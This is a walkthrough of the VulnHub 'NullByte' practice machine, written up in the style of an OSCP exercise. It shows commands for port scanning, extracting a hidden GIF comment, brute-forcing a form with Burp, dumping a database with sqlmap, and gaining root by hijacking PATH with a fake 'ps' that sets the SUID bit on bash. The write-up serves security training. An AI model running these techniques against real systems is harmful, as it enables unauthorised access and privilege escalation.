vulnhub-nullbyte - OSCP-style practice

Posted by admin
  • hidden information in a gif
  • brute-forcing the key with burp
  • sql injection
  • privilege escalation via an environment variable

Information gathering

Port scanning

Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE
80/tcp  open  http
111/tcp open  rpcbind
777/tcp open  multiling-http

Directory scanning

Scanning the directories on port 80 turned up phpmyadmin

Attempts at weak-password brute forcing, exploiting known vulnerabilities, etc. all failed

Next, download main.gif from the home page and read its metadata with exiftool, which reveals a hidden comment

➜  NullByte exiftool main.gif 
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302
Megapixels                      : 0.071

kzMb5nVYJw is a directory path on the web server


A comment in the page source hints that the key has to be brute-forced

<!-- this form isn't connected to mysql, password ain't that complex --!>

Capture the request with burp and brute-force the key with the /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt wordlist to get the result


Save the captured request to a file and run sqlmap against it to perform sql injection

sqlmap -r data --dump
----
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass                                        | user   | position   |
+----+---------------------------------------------+--------+------------+
| 1  | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank>    |
| 2  | --not allowed--                             | isis   | employee   |
+----+---------------------------------------------+--------+------------+
-----

After base64 decoding the pass field we get the hash

c6d6bd7ebf806f43c76acc3681703b81

The plaintext is omega

ROOT

ramses@NullByte:/tmp$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/procmail
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/bin/mount
/bin/umount
/sbin/mount.nfs
ramses@NullByte:/tmp$ /var/www/backup/procwatch # judging from the output, it runs the ps command
  PID TTY          TIME CMD
18286 pts/0    00:00:00 procwatch
18287 pts/0    00:00:00 sh
18288 pts/0    00:00:00 ps
ramses@NullByte:/tmp$ echo "chmod u+s /bin/bash" > ps # privilege escalation via the PATH environment variable
ramses@NullByte:/tmp$ chmod +x ps
ramses@NullByte:/tmp$ export PATH=/tmp:$PATH
ramses@NullByte:/tmp$ /var/www/backup/procwatch
ramses@NullByte:/tmp$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1105840 Nov 13  2014 /bin/bash # after running procwatch again, bash has the s bit

Verification

ramses@NullByte:/tmp$ /bin/bash -p
bash-4.3# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
proof.txt
bash-4.3# cat proof.txt 
adf11c7a9e6523e630aaf3b9b7acb51d

It seems that you have pwned the box, congrats. 
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com


USE THIS PGP PUBLIC KEY

